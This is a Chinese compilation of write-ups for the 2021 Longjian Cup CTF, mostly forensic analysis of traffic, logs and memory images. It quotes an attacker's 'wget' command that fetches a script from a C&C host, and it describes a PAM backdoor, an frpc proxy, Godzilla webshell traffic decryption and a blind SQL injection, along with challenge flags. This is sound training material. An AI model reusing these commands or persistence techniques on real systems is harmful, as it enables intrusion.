陇剑杯 2021 write up整理

2023-05-16

竞赛 write up 收集和整理

  • 陇剑杯 2021 write up整理
    • 1 签到题
      • 1.1
    • 2 JWT
      • 2.1
      • 2.2
      • 2.3
      • 2.4
      • 2.5
      • 2.6
    • 3 webshell
      • 3.1
      • 3.2
      • 3.3
      • 3.4
      • 3.5
      • 3.6
      • 3.7
    • 4 日志分析
      • 4.1
      • 4.2
      • 4.3
    • 5 流量分析
      • 5.1
      • 5.2
      • 5.3
    • 6 内存分析
      • 6.1
      • 6.2
    • 7 简单日志分析
      • 7.1
      • 7.2
      • 7.3
    • 8 SQL注入
      • 8.1
      • 8.2
      • 8.3
    • 9 wifi
      • 9.1
    • 10 IOS
      • 10.1
      • 10.2
      • 10.3
      • 10.4
      • 10.5
      • 10.6 暂未发现write up
      • 10.7
      • 10.8
    • 11 加密的大文件
      • 11.1

陇剑杯 2021 write up整理

1 签到题

1.1

【题目描述】
此时正在进行的可能是_http_协议的网络攻击。(如有字母请全部使用小写,填写样例:http,dns,ftp)

【操作内容】
如下图可知,正在进行的可能为 http 协议攻击。
在这里插入图片描述

2 JWT

2.1

【题目描述】
该网站使用了_jwt_认证方式。(如有字母请全部使用小写)

【操作内容】
简单的流量审计,查看登录后的 cookie 可知使用了 jwt 的认证方式。
在这里插入图片描述

2.2

【题目描述】
黑客绕过验证使用的jwt中,id和username是_10087#admin _。

【操作内容】

方法1:简单的流量审计,查看绕过用的 jwt cookie可得id和username为10087#admin。
在这里插入图片描述
方法2:搜索username得到
在这里插入图片描述

2.3

【题目描述】
黑客获取webshell之后,权限是_== root==_?

【操作内容】
查看命令执行的结果可得:
在这里插入图片描述
在这里插入图片描述

2.4

【题目描述】
黑客上传的恶意文件文件名是_/tem/1.c_。

【操作内容】
查看命令执行内容可得:
在这里插入图片描述

2.5

【题目描述】
黑客在服务器上编译的恶意so文件,文件名是_looter.so_。

【操作内容】
查看命令执行内容可得:
在这里插入图片描述

2.6

【题目描述】
黑客在服务器上修改了一个配置文件,文件的绝对路径为_/etc/pam.d/common-auth_。

【操作内容】
发现文件“looter.so”文件被导向/etc/pam.d/common-auth路径,猜测这里就是被修改的配置文件。
在这里插入图片描述

3 webshell

3.1

【题目描述】
黑客登录系统使用的密码是_Admin123!@#_。

【操作内容】
在流量包中搜索pass、password或者admin,即可查询到密码为“Admin123!@#”。
在这里插入图片描述

3.2

【题目描述】
黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Logs/Home/21_08_07.log_。

【操作内容】
对日志进行分析,查看哪个数据包的流跟踪中带有log文件,如下图所示:
在这里插入图片描述

3.3

【题目描述】
黑客获取webshell之后,权限是_ www-data_?

【操作内容】
在这里插入图片描述

3.4

【题目描述】
黑客写入的webshell文件名是_1.php_。

【操作内容】
字符串过滤,对post数据包进行查找和分析,发现第337个数据包post上去了webshell文件,写入的webshell文件名为1.php。
在这里插入图片描述

3.5

【题目描述】
黑客上传的代理工具客户端名字是_frpc_。

【操作内容】
查看上传的配置文件可得客户端名字为frpc。

方法1:
在这里插入图片描述
方法2:
在这里插入图片描述

3.6

【题目描述】
黑客代理工具的回连服务端IP是_192.168.239.123_。

【操作内容】
在这里插入图片描述
获得一串十六进制代码,直接010Editor打开
在这里插入图片描述

3.7

【题目描述】
黑客的socks5的连接账号、密码是_0HDFt16cLQJ#JTN276Gp_。

【操作内容】
查看上传的配置文件可得账号和密码,如下图所示:
在这里插入图片描述

4 日志分析

4.1

【题目描述】
网络存在源码泄漏,源码文件名是__www.zip__。

【操作内容】
(1) 使用sublime_text编辑器打开access.log文件,删除404所在行的所有信息(ctrl+f,find all,ctrl+L,delete),得到如下信息:
在这里插入图片描述
(2) 使用burpsuit将上图中带有url编码的路径进行url decode,结果如下:
在这里插入图片描述
(3) 以上内容可知源码的文件名为www.zip。
在这里插入图片描述

4.2

【题目描述】
分析攻击流量,黑客往/tmp目录写入一个文件,文件名为__sess_car__。

【操作内容】
继续分析上一步骤burpsuit解码后的文件,可发现黑客写入的文件为sess_car。
在这里插入图片描述

4.3

【题目描述】
继续分析4.1中burpsuit解码后的文件,可以发现黑客使用了SplFileObject类读取了秘密文件flag。

【操作内容】
在这里插入图片描述

5 流量分析

5.1

【题目描述】
攻击者的IP是____ == 172.18.0.125 ==_________。

【操作内容】
分析pcap流量包,主机ip应该是172.18.0.1,可以看到很多UDP协议的包。在看包内容的时候,注意到UDP包头都是P05=,而且有的是有base64,也有乱码的包。P05=后面都是00 00 00 00和01 00 00 00,其中00的长度是32、01的长度是16,可能是认证。

根据长度为16猜测可能是aes,用长度16的base64(即P05=后面是01 00 00 00的)作为aes key解密发现解密成功了,02 00 00 00对应的包里面都有一个可见字符,其中受害IP172.18.0.125有命令:wget http://147.182.251.98/d.sh。

在这里插入图片描述

5.2

【题目描述】
攻击者所使用的会话密钥是______ ==DtX0GScM9dwrgZht ==_______。

【操作内容】

5.3

【题目描述】
攻击者所控制的C&C服务器IP是____ == 147.182.251.98 ==_________。

【操作内容】
第三问ip即为147.182.251.98(udp.stream eq 85)

6 内存分析

6.1

【题目描述】
虚拟机的密码是____ flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}_________。(密码中为flag{xxxx},含有空格,提交时不要去掉)

【操作内容】
这里可以使用工具自带的lsadump也可以安装mimikatz插件获取
在这里插入图片描述

6.2

虚拟机中有一个某品牌手机的备份文件,文件里的图片里的字符串为______ flag{TH4NK Y0U FOR DECRYPTING MY DATA}_______。(解题过程中需要用到上一题答案中flag{}内的内容进行处理。本题的格式也是flag{xxx},含有空格,提交时不要去掉)

【操作内容】
在这里插入图片描述
这里使用filescan扫描CTF用户的文件,发现了华为P40的备份文件
在这里插入图片描述

于是把华为备份文件dump出来,同时可以直接在dat文件里把备份文件夹解压出来,再利用工具 kobackupdec
在这里插入图片描述
即可获取flag
在这里插入图片描述

7 简单日志分析

7.1

【题目描述】
黑客攻击的参数是_user_(如有字母请全部使用小写)

【操作内容】
1、将日志文件中反馈为404的条目去掉,剩下3条数据包,数据包如下:
在这里插入图片描述

2、对数据包进行分析,即可获得黑客攻击的参数为user,如下图所示:
在这里插入图片描述

7.2

【题目描述】
黑客查看的秘密文件的绝对路径是_/Th4s_IS_VERY_Import_Fi1e_。

【操作内容】
1、将日志文件中反馈为404的条目去掉,剩下3条数据包,数据包如下:
在这里插入图片描述

2、提取get对应的参数,结果如下:
在这里插入图片描述

3、将获取到的参数放入burpsuit进行base64解码,结果如下:
在这里插入图片描述

在这里插入图片描述

因此秘密文件的绝对路径是:/Th4s_IS_VERY_Import_Fi1e

7.3

【题目描述】
黑客反弹shell的hip和端口是__192.168.2.197:8888__(格式使用"ip:端口",例如127.0.0.1:2333)

【操作内容】
分析7.2获取到的信息,即可发现反弹shell的ip和端口是:192.168.2.197:8888。
在这里插入图片描述

8 SQL注入

8.1

【题目描述】
黑客在注入过程中采用的注入手法叫__布尔盲注__。(格式为4个汉字,例如"拼博努力")

【操作内容】
根据注入特征得知为布尔盲注。
在这里插入图片描述

8.2

【题目描述】
黑客在注入过程中,最终获取flag的数据库名、表名和字段名是__sqli#flag#flag__。(格式为“数据库名#表名#字段名",例如database#tableffcolumn)

【操作内容】
根据日志分析,获取到flag的“数据库名#表名#字段名”分别为“sqli#flag#flag”。
在这里插入图片描述

8.3

【题目描述】
黑客最后获取到的flag字符串为__flag{deddcd67-bcfd-487e-b940-1217e668c7db}__。

【操作内容】

方法1:

1、根据布尔盲注的原理,将access.log文件中多余的数据包去除,只剩下界面为真的数据条目,如下图所示:
在这里插入图片描述

2、将获取到的条目放入burpsuit进行url解码,结果如下:
在这里插入图片描述

3、如此,成功获取到flag的值flag{deddcd67-bcfd-487e-b940-1217e668c7db}。

方法2:正则匹配

# coding : utf-8
import re
from urllib.parse import unquote

file_name = "access_1.log"
pattern_string = "select%20flag%20from%20sqli.flag"
#file_name = input("输入文件名,文件记得要在当前脚本目录下:")
#pattern_string = input("复制个特征值过来,比如select,flag啥的:")
flag = ''

# 打开文件以及读取行数
get_File = open(file_name, "r+")
get_line = get_File.readline()

while get_line:
    get_Data = re.search(pattern_string, get_line)
    if get_Data:
        get_Data_Num = re.search(r'4[7-8][0-1]?.*', get_Data.string)
        if get_Data_Num:
            flag += (re.findall(r"%20=%20\'(.+?)\'", get_Data_Num.string))[0]
            print(unquote(flag[:-1], 'utf-8'))
    get_line = get_File.readline()
get_File.close()

9 wifi

9.1

【题目描述】
小王往upload-labs上传木马后进行了cat /flag,flag内容为_____ flag{5db5b7b0bb74babb66e1522f3a6b1b12}________。(压缩包里有解压密码的提示,需要额外添加花括号)

【操作内容】
分析 服务端.pcapng获取1.php

在这里插入图片描述
打开 客户端.cap发现是加密的Wi-Fi包
在这里插入图片描述

对内存进行分析(看桌面,看admin,意外发现Mywifi.zip)
在这里插入图片描述
这里就需要一个前置知识了

网卡的 GUID 和接口绑定是绑定的,win7的wifi密码就存放在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces[网卡Guid]

如果不知道这里,其实也可以使用命令:

getmac /V /S 127.0.0.1 

然后再everything搜索一下,因此这里直接搜索Interface。
在这里插入图片描述
解压之后回去xml,里面存在wifi的信息
在这里插入图片描述
因此可以解密wifi流量
在这里插入图片描述

这里也可以使用如下命令

在这里插入图片描述
解密后可以获取加密返回的信息,到这里基础信息收集完毕了,剩下的就是解密流量了,参考文章:

https://www.freebuf.com/sectool/285693.html
https://blog.csdn.net/zeros__/article/details/111521314

在这里插入图片描述

根据上面的文章可以知道(对于PHP_XOR_BASE64加密方式来说,前后各附加了16位的混淆字符),所以我们拿到的流量要先删除前16位和后16位字符,同时Godzilla的流量还会进行一个gzip压缩,因此最外层还要用gzdecode进行一次解码。
最终解密1198号数据包的时候获取flag

在这里插入图片描述

在这里插入图片描述

在5.x的环境中运行获取flag flag{5db5b7b0bb74babb66e1522f3a6b1b12}

最后提供一个非常大神的解决方案,自己用同样的木马连接一下,然后改返回包就行了
在这里插入图片描述

10 IOS

10.1

【题目描述】
黑客所控制的C&C服务器IP是__3.128.156.159__。

【操作内容】
跟进流量中的TCP报文,发现在第15个TCP流中发现明文流量,首先从GitHub中下载了ios_agent后门程序,如下图所示:
在这里插入图片描述
然后与攻击服务器建立连接,如下所示:
在这里插入图片描述

得知C&C服务器为3.128.156.159。

10.2

【题目描述】
黑客利用的Github开源项目的名字是__stowaway__。(如有字母请全部使用小写)

【操作内容】
基于github字符串类型过滤流量包内容,匹配到以下数据包:
在这里插入图片描述

在这里插入图片描述

因此下载到的开源项目名称为:stowaway。

10.3

【题目描述】
通讯加密密钥的明文是__hack4sec__。

【操作内容】
根据TCP流量,得知该ios_agent的加密密钥明文hack4sec,如下图所示:
在这里插入图片描述

10.4

【题目描述】
盲注拿到了一个敏感数据__746558f3-c841-456b-85d7-d6c0f2edabb2__。

【操作内容】
这里需要先对TLS数据流进行解密。首选项,TLS 选择keylog.txt
在这里插入图片描述

数据流过滤为http2,然后对数据流进行盲注分析(这里我进行了导出并进行了urldecode)
在这里插入图片描述

这个题跟上面的日志分析一样,最后hex转一下就可以了

746558f3-c841-456b-85d7-d6c0f2edabb2

10.5

【题目描述】
黑客端囗扫描的扫描器的扫描范围是__10-499__。(格式使用“开始端口-结束端口”)

【操作内容】
1、基于跳板服务器进行分析,可以发现其一直进行端口扫描的目标ip为192.168.1.12,wireshark过滤后结果如下图:
在这里插入图片描述在这里插入图片描述
2、因此扫描器的扫描范围为:10-499。

10.6 暂未发现write up

【题目描述】
被害者手机上被拿走了的私钥文件内容是___________。

【操作内容】

10.7

【题目描述】
黑客访问/攻击了内网的几个服务器,IP地址为__172.28.0.2#192.168.1.12__。

【操作内容】
方法1:access.log很明显的,172.28.0.2为已被攻击。结合上题被疯狂扫描,认为是192.168.1.12。

方法2:跳板机地址为192.168.1.8,通过科来分析源ip为192.168.1.8,目标地址为本地ip的tcp流量,发现两个IP:172.28.0.2#192.168.1.12。

10.8

【题目描述】
黑客写入了一个webshell,其密码为__fxxk__。

【操作内容】
分析提供的access.log即可获得到写入的webshell密码fxxk。
在这里插入图片描述

11 加密的大文件

11.1

【题目描述】

【操作内容】

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

陇剑杯 2021 write up整理 的相关文章

  • 2021-09-19 当SONiC遇到P4之二

    当SONiC遇到P4之二 P4描述SAI 在当SONiC遇到P4中介绍了用P4来实现SAI Model的方式 xff0c 这种方式利用了P4数据平面编程的功能实现了SAI模型 xff0c 将P4和SONiC这两个分别位于网络数据平面和控制平
  • 北理工-2021年春-《数字逻辑》实验

    北理工 2021年春 数字逻辑 实验 实验二 组合电路设计 实验目的 本实验通过设计一个组合电路实例 xff0c 让学生掌握组合逻辑电路从设计到验证的全过程 通过该实验 xff0c 可以加深学生对组合电路原理和设计的理解 xff0c 同时可
  • 2021-03-08

    解决大疆无人机电池电压不平衡出现电池错误提示无法起飞 一个简单的笨办法 xff0c 处理某块电芯偏低 xff0c 而另一块明显偏高 xff0c 经平衡和数据修正后 xff0c 在使用中反复 xff0c 说明各电芯之间容量发生物理不可逆的容量
  • 2021-08-30 创建tensor时,注意不要让梯度消失了

    下面这种是错误的 xff0c 梯度会消失 data span class token operator 61 span torch span class token punctuation span tensor span class to
  • 【2021年8月】解决 rosdep update超时问题

    修改两个文件即可快速解决超时问题 1 修改 etc ros rosdep sources list d 20 default list 执行sudo gedit etc ros rosdep sources list d 20 defaul
  • 2021-01-20

    中文字库液晶模块12864示例程序范例 xff1a 液晶屏型号 xff1a JLX12864G 086 PC 3S 接口 xff1a 串行 中文字库 xff1a 带中文字库IC JLX GB2312 竖置横排 驱动IC UC1701X 与S
  • 2021互联网大厂职级对应薪资一览表

    原文连接 xff1a https mp weixin qq com s nYNZjJJzrO0Sc5h2AEPnaQ 互联网大厂新入职员工各职级薪资对应表 xff08 技术线 xff09 图片数据来源 xff1a 知乎加 上面的表格不排除有
  • 位姿图优化小记2021.10.18

    1 场景描述 现在有一个小车在运动 xff0c 并搭载相机或激光雷达进行建图工作 xff0c 由于SLAM的作用 xff0c 在建图的同时小车也可以进行自身的定位 xff0c 因此建立的地图的参考都是相对于自身坐标系的 xff0c 也就是每
  • 串口通信学习(GPS模块)2021.5.10

    GPS串口通信学习实践 2021 5 10 1 串口通信简介1 1 波特率1 2 数据位1 3 停止位1 4 奇偶校验位 2 GPS模块串口通信配置2 1 驱动安装2 2 插入GPS模块2 3 GPS模块串口通信数据简介 3 Java实现G
  • python中stdin.write_关于python:subprocess popen.communicate()与stdin.write()和stdout.read()

    我注意到两种方法的两种不同的行为应该导致相同的结果 目标 使用子过程模块执行外部程序 xff0c 发送一些数据并读取结果 外部程序是PLINK xff0c 平台是WindowsXP xff0c Python版本3 3 主要思想 execut
  • 2021-03-08

    今天在网上安装PR xff0c 网上下载的安装器把电脑默认装了一大堆垃圾工具 xff0c 依次删除后突然发现谷歌浏览器主页被篡改了 xff0c 随后用360等工具修复 xff0c 均提示无异常 通过浏览器设置和重置主页后仍然无效 xff0c
  • 2021-03-08

    大疆无人机自己动手更换电芯的注意事项 xff0c 当电池多电芯出现均大压差且调整数据无效后 xff0c 或发现某块或多块电芯鼓包 xff0c 说明电芯已经老化 xff0c 寿命用尽 xff0c 就需要更换电芯了 xff0c 厂家为保护消费者
  • 2021电赛F题视觉教程+代码免费开源

    2021电赛F题视觉教程 43 代码免费开源 最近好多要电赛题的源码 xff0c 其他csdn营销号下载都需要会员或钱 xff0c 正好最近课设又要做一遍电赛小车题 xff0c 哥们先把代码开源了 xff0c 饿死营销号 电赛宝藏链接 xf
  • 海思文件系统缺少文件himm 、i2c_read 、i2c_write 、ssp_read 、ssp_write

    原因 xff1a 海思根文件默认没有把himm i2c read i2c write ssp read ssp write工具集成在bin里 xff0c 但是在sdk中 解决办法 xff1a cd osdrv tools board reg
  • 2021校招_大华

    大华面试 xff1a 一面和二面 一面 xff1a 首先自我介绍 1 序列化的使用方式以及情景 2 Springboot的启动过程 3 Mysq中lB 43 树和B树索引区别 xff0c 聚簇索引和非聚簇索引区别 4 Spring中bean
  • 2021-01-11

    C 43 43 指针随便笔记 sizeof 先说一个没有成员函数和参数的类 xff0c 占用一个字节 类中的成员函数 xff0c 作为外部指针时 xff0c 需要记得delete xff0c 否则会内存泄漏 指针的sizeof是指针本身的数
  • SIGPIPE的设计意图

    SIGPIPE的设计意图 SIGPIPE 是为以下这种情况设计的 grep pattern lt reallyhugefile head grep可能会输出成千上万行文本 但 head 只会读取前10行然后就退出 一旦head退出 grep
  • Linux的c编程-文件节点的打开与读写操作

    1 open 打开文件 相关函数 read write fcntl close link stat umask unlink fopen 表头文件 include
  • Linux文件编程常用函数详解——read()和write()函数

    read 函数 include
  • UNIX网络编程-recv、send、read、write之间的联系与区别

    原文链接 http www cnblogs com mhscn p 3911284 html include

随机推荐

  • 【C/C++】- STL(ing)

    目录 一 概述 二 模板 三 迭代器 1 什么是迭代器 例 1 为数组容器 链表容器编制共同显示函数 2 进一步理解迭代器 3 STL迭代器 xff08 1 xff09 输入迭代器 xff1a xff08 2 xff09 输出迭代器 xff
  • OpenStack 运维异常问题处理小结

    在OpenStack云平台运维过程中会遇到创建虚机 创建磁盘 删除磁盘和虚机过程中出现相关问题 xff0c 本篇针对运维过程中的一些问题做一些小结 xff0c 希望可以给云运维的你们提供一些帮助 问题1 创建磁盘提示error报错 root
  • 续集来了!我让 GPT-4 用 Laf 三分钟写了个完整的待办事项 App

    书接前文 xff0c 上篇文章我们教大家如何三分钟时间用 Laf 实现一个自己的 ChatGPT 一觉醒来 xff0c GPT 4 已经发布了 xff01 GPT 4 实现了真正的多模态 xff0c 可以把纸笔画的原型直接写出网页代码 读论
  • 【EtherCAT理论篇】二、EtherCAT工作原理

    1 EtherCAT系统组成 EtherCAT是一种实时以太网技术 xff0c 由一个主站设备和多个从站设备组成 主站设备使用标准的以太网控制器 xff0c 具有良好的兼容性 xff0c 任何具有网络接口卡的计算机和具有以太网控制的嵌入式设
  • 【EtherCAT分析】一、EtherCAT从站硬件分析

    1 EtherCAT从站控制芯片 EtherCAT从站控制芯片ESC是实现EtherCAT数据链路层协议的核心 xff0c 它处理EtherCAT数据帧 xff0c 并提供数据接口 从站控制器通常都有一个内部的DPRAM xff0c 并提供
  • 【EtherCAT实践篇】六、更改XML,增加输入输出变量

    目的 xff1a 在EtherCAT开发板上IO程序 xff08 基于SSC的IO通讯 xff09 基础上进行修改 xff0c 实现16路拨码开关输入 xff0c 以及16路LED输出 EtherCAT从站增加变量的操作包括两个部分 xff
  • 【SOEM主站】一、SOEM主站环境搭建及连接板子测试

    目的 xff1a 在windows环境下搭建SOEM主站 xff0c 并利用SOEM自带例程测试EtherCAT板子从站板通讯效果 1 SOEM主站环境搭建 xff08 1 xff09 安装VS xff1a 我这里安装的是VS2017 xf
  • 【EtherCAT实践篇】七、更改XML示例2,增加16位模拟输入

    目的 xff1a 在EtherCAT开发板上IO程序基础上增加一个16位的变量mytest xff0c 用于传输模拟量发送给主站 1 EtherCAT增加变量说明 在实际使用中 xff0c 可现有程序的输入输出变量可能不能直接满足实际需求
  • 【EtherCAT实践篇】八、更改XML示例3,增加16位模拟DAC输出

    目的 xff1a 在EtherCAT开发板上IO程序 xff08 基本IO通讯 基于SSC xff09 基础上进行修改 xff0c 增加一路模拟量输出 xff0c 并输出给DAC管脚 由于STM32F405底板具有DAC输出功能 xff0c
  • Pixhawk固件PX4之串口通讯

    1 目的 为进一步扩展pixhawk的接口及功能 xff0c 通过pixhawk现有接口 xff08 串口 I2C等 xff09 连接外部设备来实现 xff0c 本节内容主要介绍串口通讯方式 2 测试平台 硬件 xff1a pixhawk
  • 手机充电原理分析及问题总结

    xff08 1 xff09 充电流程介绍 xff1a 当充电器插入时 xff0c 亦即为PMIC充电模块提供了Vcharge电压 xff0c 这时会产生一个充电中断信号到CPU xff0c 通知CPU现在已经进入充电状态 CPU开始启动如下
  • 串口接收不定长数据的几种方法

    串口作为单片机开发的一个常用的外设 xff0c 应用范围非常广 大部分时候 xff0c 串口需要接收处理的数据长度是不定的 那么怎么才能判断一帧数据是否结束呢 xff0c 今天就以STM32单片机为例 xff0c 介绍几种接收不定长数据的方
  • 删除分节符的技巧

    WORD中删除分节符有这样的规定 xff1a 如果要删除分节符 xff0c 只要把光标移动到该分节符上 xff0c 按Delete键即可 但是要注意该分节符前面的文字将合并到后面的节中 xff0c 并且采用后者的格式设置 我就不知道天杀的微
  • 虚机创建异常报错No valid host was found,There are not enough hosts available

    虚机创建异常 xff0c 使用nova show 虚机ID提示fault报错信息 xff1a No valid host was found xff0c There are not enough hosts available 检查所在宿主
  • vuzzer 具体原理解析

    目录 1 安装 vmware 15 01环境下安装 xff1a 2 vuzzer使用说明 3 vuzzer原理 3 1权重文件以及有着cmp信息的文件生成 3 2 vuzzer种子生成 xff0c 变异原理 3 2 1 runfuzz py
  • C++ unordered_set

    目录 1 定义 2 基本的函数 2 1 unordered set构造 2 2 添加新的元素 注意无法插入相同元素 2 3 查找元素 2 4 查找桶接口 2 5 观察器 2 6 清除元素 2 7 其他函数 1 定义 unordered se
  • clang 10 介绍——sanitizerCoverage

    1 Introduction llvm内置了一个简单的代码覆盖率检测 xff08 sanitizercoverage xff09 它在函数级 基本块级和边缘级插入对用户定义函数的调用 提供了这些回调的默认实现 xff0c 并实现了简单的覆盖
  • C++ 匿名函数

    1 定义 所谓匿名函数 xff0c 其实类似于python中的lambda函数 xff0c 其实就是没有名字的函数 使用匿名函数 xff0c 可以免去函数的声明和定义 这样匿名函数仅在调用函数的时候才会创建函数对象 xff0c 而调用结束后
  • 给docker中的ubuntu系统安装桌面程序

    原本服务器是centos的 xff0c 用的不是很习惯 xff0c 也为了可以分割功能 xff0c 于是在服务器上装了docker xff0c docker里装了ubuntu系统 xff0c 具体过程可以参见https blog csdn
  • 陇剑杯 2021 write up整理

    竞赛 write up 收集和整理 陇剑杯 2021 write up整理1 签到题1 1 2 JWT2 12 22 32 42 52 6 3 webshell3 13 23 33 43 53 63 7 4 日志分析4 14 24 3 5